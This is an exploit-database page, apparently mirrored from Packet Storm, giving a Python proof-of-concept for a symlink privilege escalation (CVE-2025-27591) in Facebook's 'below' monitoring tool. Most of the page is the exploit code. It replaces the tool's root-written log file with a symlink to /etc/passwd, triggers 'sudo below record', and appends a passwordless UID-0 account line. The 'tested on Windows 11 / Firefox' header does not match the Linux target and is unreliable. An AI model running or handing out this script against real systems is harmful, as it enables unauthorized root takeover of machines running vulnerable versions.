Share
## https://sploitus.com/exploit?id=PACKETSTORM:219373
==================================================================================================================================
    | # Title     : Below <v0.9.0 Symlink-Based Privilege Escalation via Log Manipulation                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/facebookincubator/below                                                                       |
    ==================================================================================================================================
    
    [+] Summary    : This Python script demonstrates a potential privilege escalation technique related to CVE-2025-27591, leveraging symbolic link (symlink) manipulation in a logging directory used by the below utility.
    
    
    [+] POC        :  
    
    import os
    import subprocess
    import sys
    from pathlib import Path
    
    LOG_DIR = "/var/log/below"
    LOG_FILE = os.path.join(LOG_DIR, "error_root.log")
    TARGET_FILE = "/etc/passwd"
    TMP_PAYLOAD = "/tmp/payload"
    FAKE_USER_LINE = "nikolas-trey::0:0:nikolas-trey:/root:/bin/bash\n"
    
    def main():
        print("[*] CVE-2025-27591 exploit - Python Version")
    
        try:
            with open(TMP_PAYLOAD, 'w') as f:
                f.write(FAKE_USER_LINE)
            print(f"[+] Payload written to {TMP_PAYLOAD}")
        except IOError as e:
            print(f"[-] Failed to write payload: {e}")
            return
    
        if not os.path.isdir(LOG_DIR):
            print(f"[-] Log directory {LOG_DIR} does not exist.")
            return
    
        if not os.access(LOG_DIR, os.W_OK):
            print(f"[-] Log directory {LOG_DIR} is not writable.")
            return
    
        print(f"[+] {LOG_DIR} is writable.")
    
        if os.path.lexists(LOG_FILE):  
            try:
                os.remove(LOG_FILE)
                print(f"[+] Removed existing file/symlink: {LOG_FILE}")
            except OSError as e:
                print(f"[-] Could not remove {LOG_FILE}: {e}")
                return
    
        try:
            os.symlink(TARGET_FILE, LOG_FILE)
            print(f"[+] Symlink created: {LOG_FILE} -> {TARGET_FILE}")
        except OSError as e:
            print(f"[-] Symlink creation failed: {e}")
            return
    
        print("[*] Triggering sudo log write via `below`...")
        try:
            subprocess.run(
                ["sudo", "/usr/bin/below", "record"],
                timeout=5,
                capture_output=True,
                text=True 
            )
        except subprocess.TimeoutExpired:
            print("[*] 'below' command timed out (expected)")
        except Exception as e:
            print(f"[*] Note: execution error: {e}")
    
        try:
            with open(TMP_PAYLOAD, 'r') as p:
                data = p.read()
    
            with open(LOG_FILE, 'a') as target:
                target.write(data)
    
            print("[+] Payload appended successfully.")
        except PermissionError:
            print("[-] Permission Denied.")
        except FileNotFoundError:
            print("[-] Target file not found (symlink broken).")
        except Exception as e:
            print(f"[-] Unexpected error: {e}")
    
        print("[*] Done.")
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================